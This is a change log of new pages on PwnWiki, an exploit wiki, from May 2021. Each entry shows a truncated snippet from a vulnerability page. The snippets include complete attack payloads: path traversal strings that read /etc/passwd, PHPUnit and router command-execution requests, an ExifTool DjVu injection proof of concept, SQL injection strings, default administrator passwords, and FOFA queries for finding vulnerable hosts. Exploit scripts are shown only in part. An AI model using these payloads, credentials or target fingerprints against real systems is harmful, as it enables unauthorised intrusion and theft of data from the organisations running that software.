New pages

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

20:48, 11 May 2021 ‎CantoneseHome (hist | edit) ‎[166 bytes] ‎Pwnwiki (talk | contribs) (Created page with "{{Template:Banner0-Cantonese}}")
20:15, 11 May 2021 ‎CVE-2021-22204 ExifTool任意代碼執行漏洞/ru (hist | edit) ‎[601 bytes] ‎Pwnwiki (talk | contribs) (Created page with "CVE-2021-22204 Уязвимость выполнения произвольного кода ExifTool")
20:12, 11 May 2021 ‎CVE-2021-22204 ExifTool任意代碼執行漏洞/zh-hant (hist | edit) ‎[580 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Затронутая версия==")
17:55, 11 May 2021 ‎CVE-2021-22204 ExifTool任意代碼執行漏洞 (hist | edit) ‎[616 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==影響版本== ExifTool 7.44 to 12.23 ==POC== <pre> $ printf 'P1 1 1 0' > moo.pbm $ cjb2 moo.pbm moo.djvu $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"...")
11:46, 11 May 2021 ‎CVE-2020-28337 Microweber CMS 1.1.20 遠程代碼執行漏洞 (hist | edit) ‎[8,125 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Microweber CMS 1.1.20 - Remote Code Execution (Authenticated) # Date: 2020-10-31 # Exploit Author: sl1nki # Vendor Homepage: https://microweber...")
11:44, 11 May 2021 ‎Human Resource Information System 0.1 - 'First Name' XSS漏洞 (hist | edit) ‎[1,439 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated) # Date: 04-05-2021 # Exploit Author:...")
11:43, 11 May 2021 ‎HP Timeclock 1.04 - 'Multiple' XSS漏洞 (hist | edit) ‎[2,690 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS) # Date: May 3rd 2021 # Exploit Author: Tyler Butler # Vendor Homepage: http://timeclo...")
11:43, 11 May 2021 ‎TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path (hist | edit) ‎[1,430 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-07 # Vendor Homepage: htt...")
11:42, 11 May 2021 ‎BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path (hist | edit) ‎[1,408 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-07 # Vendor Homepage: https...")
11:40, 11 May 2021 ‎DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path (hist | edit) ‎[1,444 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-07 # Vendor Homepage: htt...")
10:49, 10 May 2021 ‎CNVD-2021-00876 Wayos AC集中管理系統默認弱口令 (hist | edit) ‎[93 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="AC集中管理系统" </pre> ==默認信息== <pre> admin/admin </pre>")
10:45, 10 May 2021 ‎CVE-2020-27986 SonarQube api 信息洩露漏洞 (hist | edit) ‎[120 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="sonarQube-代码管理" </pre> ==Payload== <pre> http://xxx.xxx.xxx.xxx/api/settings/values </pre>")
10:43, 10 May 2021 ‎XXL-JOB 任務調度中心後台默認弱口令 (hist | edit) ‎[110 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="XXL-JOB" || title="任务调度中心" </pre> ==默認信息== <pre> admin 123456 </pre>")
10:41, 10 May 2021 ‎XXL-JOB 任務調度中心後台任意命令執行漏洞 (hist | edit) ‎[504 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="XXL-JOB" || title="任务调度中心" </pre> ==漏洞利用== 登錄後台增加一個任務: 600px 注意運行模式需要為 GL...")
10:31, 10 May 2021 ‎會捷通雲視訊 list 目錄文件洩露漏洞 (hist | edit) ‎[180 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> body="/him/api/rest/v1.0/node/role" </pre> ==Payload== <pre> /him/api/rest/V1.0/system/log/list?filePath=../ </pre> ==參考== https://short.pwnwiki.org/?c=v...")
15:38, 9 May 2021 ‎電信天翼網關F460 web shell cmd.gch 遠程命令執行漏洞 (hist | edit) ‎[146 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="F460" </pre> ==漏洞利用== 出現漏洞的文件為 web_shell_cmd.gch 直接輸入命令就可以執行 cat /etc/passwd")
15:37, 9 May 2021 ‎PHPUnit eval-stdin.php 遠程命令執行漏洞 (hist | edit) ‎[172 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== PHPUnit < 5.6.3 ==Payload== <pre> POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: Content-Length: 21 Accept-Encoding: gzip </pre>")
09:03, 9 May 2021 ‎EzEIP 4.1.0 信息洩露漏洞 (hist | edit) ‎[287 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "ezEIP" </pre> ==漏洞利用== 漏洞Url為: <pre> /label/member/getinfo.aspx </pre> 訪問時添加Cookie（通過遍歷獲取用戶的登錄名電話郵箱...")
17:02, 8 May 2021 ‎2018-7602 Drupal遠程代碼執行漏洞 (hist | edit) ‎[4,333 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==影響版本== DRUPAL 7 <= 7.58 ==EXP== <pre> #!/usr/bin/env python3 import requests import argparse from bs4 import BeautifulSoup def get_args(): parser = argparse.Arg...")
17:01, 8 May 2021 ‎CVE-2018-7600 Drupal遠程代碼執行漏洞 (hist | edit) ‎[2,945 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==影響版本== DRUPAL 7 <= 7.57 ==EXP== <pre> #!/usr/bin/env python3 import requests import argparse from bs4 import BeautifulSoup def get_args(): parser = argparse.Ar...")
16:49, 8 May 2021 ‎CVE-2016-10009 OpenSSH 小於 7.4 agent Protocol Arbitrary Library Loading漏洞 (hist | edit) ‎[2,056 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009 The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGE...")
10:49, 8 May 2021 ‎Panabit 智能應用網關 ajax top 後台命令執行漏洞 (hist | edit) ‎[4,764 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==默認賬戶密碼== admin/panabit ==Request== <pre> POST /cgi-bin/Maintain/ajax_top?action=runcmd&cmd=ls HTTP/1.1 Host: Connection: close Content-Length: 0 sec-ch-ua: " N...")
10:47, 8 May 2021 ‎Panabit iXCache ajax cmd 後台命令執行漏洞 (hist | edit) ‎[4,868 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==默認賬戶密碼== admin/ixcache ==漏洞利用== 進入後台後點擊命令行，訪問Url <pre> /cgi-bin/Maintain/cfg_cmd </pre> 輸入命令時使用 ; 即可命...")
10:44, 8 May 2021 ‎Panabit Panalog cmdhandle.php 後台命令執行漏洞 (hist | edit) ‎[4,752 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==默認賬號密碼== admin/panabit ==Request== <pre> POST /Maintain/cmdhandle.php HTTP/1.1 Host: Connection: close Content-Length: 31 sec-ch-ua: " Not A;Brand";v="99", "...")
10:39, 8 May 2021 ‎CVE-2021-30657 macOS Gatekeeper檢查繞過漏洞 (hist | edit) ‎[4,270 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==INFO== <pre> This Metasploit module serves an OSX app (as a zip) that contains no Info.plist, which bypasses gatekeeper in macOS versions prior to 11.3. If the user visits t...")
10:10, 8 May 2021 ‎Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path (hist | edit) ‎[1,323 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-06 # Vendor Homepage: https://gi...")
10:07, 8 May 2021 ‎PHP Timeclock 1.04 SQL注入漏洞 (hist | edit) ‎[2,085 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: 03.05.2021 # Exploit Author: Tyler Butler # Vendor Homepage: http://time...")
10:05, 8 May 2021 ‎Epic Games Rocket League 1.95 堆棧緩衝區溢出漏洞 (hist | edit) ‎[18,766 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Epic Games Rocket League 1.95 - Stack Buffer Overrun # Date: 25.04.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.epicgames.co...")
10:04, 8 May 2021 ‎Human Resource Information System 0.1 遠程代碼執行漏洞 (hist | edit) ‎[3,536 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) # Date: 04-05-2021 # Exploit Author: Reza Afsahi # Vendor Homepa...")
10:03, 8 May 2021 ‎Voting System 1.0 身份驗證繞過漏洞 (hist | edit) ‎[2,291 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI) # Date: 06/05/2021 # Exploit Author: secure77 # Vendor Homepage: https://www.sourcecodester.com...")
10:02, 8 May 2021 ‎Epic Games Easy Anti-Cheat 4.0 本地權限提升漏洞 (hist | edit) ‎[1,983 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation # Date: 04.05.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.epicg...")
17:15, 7 May 2021 ‎CVE-2020-28187 TerraMaster TOS 後台任意文件讀取漏洞 (hist | edit) ‎[136 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== TerraMaster TOS < 4.2.06 ==Payload== <pre> /tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd </pre>")
17:14, 7 May 2021 ‎CVE-2020-28187 TerraMaster TOS 任意賬號密碼修改漏洞 (hist | edit) ‎[425 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 首先需要知道已知用戶名，可以參考 [https://www.pwnwiki.org/index.php?title=CVE-2020-28185_TerraMaster_TOS_%E7%94%A8%E6%88%B6%E6%9E%9A%E8%88%89%...")
17:13, 7 May 2021 ‎CVE-2020-28185 TerraMaster TOS 用戶枚舉漏洞 (hist | edit) ‎[203 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 輸入用戶名 admin 點擊確定，查看Burp捕獲的包其中有一個請求包用於確認用戶admin是否存在 600px 存在...")
17:09, 7 May 2021 ‎CVE-2020-28188 TerraMaster TOS RCE漏洞 (hist | edit) ‎[2,822 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== TerraMaster TOS < 4.2.06 ==FOFA== <pre> "TerraMaster" && header="TOS" </pre> ==POC== <pre> # Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated) #...")
17:07, 7 May 2021 ‎H3C SecParh堡壘機 get detail view.php 任意用戶登錄漏洞 (hist | edit) ‎[229 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="H3C-SecPath-运维审计系统" && body="2018" </pre> ==Payload== <pre> /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(...")
17:06, 7 May 2021 ‎阿爾法科技虛擬仿真實驗室未授權訪問漏洞 (hist | edit) ‎[127 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> body="河南阿尔法科技有限公司" </pre> ==Payload== <pre> /admin/student/studentlist.html?page=1 </pre>")
17:04, 7 May 2021 ‎ICEFlow VPN 信息洩露漏洞 (hist | edit) ‎[585 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="ICEFLOW VPN Router" </pre> ==漏洞利用== 可訪問的日誌 Url <pre> 系統日誌 http://url/log/system.log VPN日誌 http://url/log/vpn.log 訪問...")
17:01, 7 May 2021 ‎Alibaba Canal config 云密鑰信息洩露漏洞 (hist | edit) ‎[216 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="Canal Admin" </pre> ==Payload== <pre> /api/v1/canal/config/1/0 </pre> 其中洩露了 aliyun.access 密鑰，可以控制密鑰下的所有服務器...")
16:59, 7 May 2021 ‎Hue 後台編輯器命令執行漏洞 (hist | edit) ‎[225 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="Hue - 欢迎使用 Hue" </pre> ==漏洞利用== 上傳並編輯文件為執行的命令 600px 按如下步驟點擊即可執行...")
16:55, 7 May 2021 ‎IBOS 數據庫模塊任意文件上傳漏洞 (hist | edit) ‎[587 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== IBOS < 4.5.5 ==FOFA== <pre> body="IBOS" && body="login-panel" </pre> ==漏洞利用== 登錄頁面如下 <pre> http://xxx.xxx.xxx.xxx/?r=dashboard/default/...")
16:50, 7 May 2021 ‎銳捷EG易網關 cli.php 遠程命令執行漏洞 (hist | edit) ‎[4,564 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 發送以下請求: <pre> POST /cli.php?a=shell HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 24 Content-Type: application/x-www-form-urlenco...")
16:48, 7 May 2021 ‎銳捷EG易網關管理員賬號密碼洩露漏洞 (hist | edit) ‎[2,492 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 發送以下請求： <pre> POST /login.php HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 49 Content-Type: application/x-www-form-urlencoded...")
16:46, 7 May 2021 ‎銳捷EG易網關 download.php 後台任意文件讀取漏洞 (hist | edit) ‎[4,339 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="Ruijie-EG易网关" </pre> ==Payload== <pre> /download.php?a=read_txt&file=../../../../etc/passwd </pre> ==POC== <pre> #!/usr/bin/python3 #-*- coding:utf...")
16:43, 7 May 2021 ‎銳捷NBR 1300G路由器越權CLI命令執行漏洞 (hist | edit) ‎[3,198 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="锐捷网络 --NBR路由器--登录界面" </pre> ==Request== <pre> POST /WEB_VMS/LEVEL15/ HTTP/1.1 Host: Connection: keep-alive Content-Length: 73 Aut...")
16:39, 7 May 2021 ‎安美數字酒店寬帶運營系統 server ping.php 遠程命令執行漏洞 (hist | edit) ‎[3,419 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "酒店宽带运营" </pre> ==漏洞利用== GET傳入 $ip參數後直接命令執行，並且文件無權限要求請求包為: <pre> GET /manager/radius/s...")
16:36, 7 May 2021 ‎杭州法源軟件公證實務教學軟件 SQL注入漏洞 (hist | edit) ‎[1,065 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 抓包： <pre> POST /JusNotary/ HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 219 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: appli...")
16:34, 7 May 2021 ‎杭州法源軟件法律知識數據庫系統後台XSS漏洞 (hist | edit) ‎[149 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> icon_hash="2018105215" || title="实践教学平台 - 杭州法源软件开发有限公司" </pre> ==XSS== 600px")
16:31, 7 May 2021 ‎杭州法源軟件法律知識數據庫系統 SQL注入漏洞 (hist | edit) ‎[1,840 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> icon_hash="2018105215" || title="实践教学平台 - 杭州法源软件开发有限公司" </pre> ==漏洞地址== <pre> http://xxxxxxx/JusRepos/ui/login.aspx...")
16:27, 7 May 2021 ‎CVE-2021-3017 Intelbras Wireless 未授權&密碼洩露漏洞 (hist | edit) ‎[150 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> body="def_wirelesspassword" </pre> ==漏洞利用== 查看源代碼即可獲得密碼信息。搜索<code>def_wirelesspassword</code>")

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

Anonymous

Search

New pages

Namespaces

More

Page actions

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

New pages

Navigation

Wiki tools

Page tools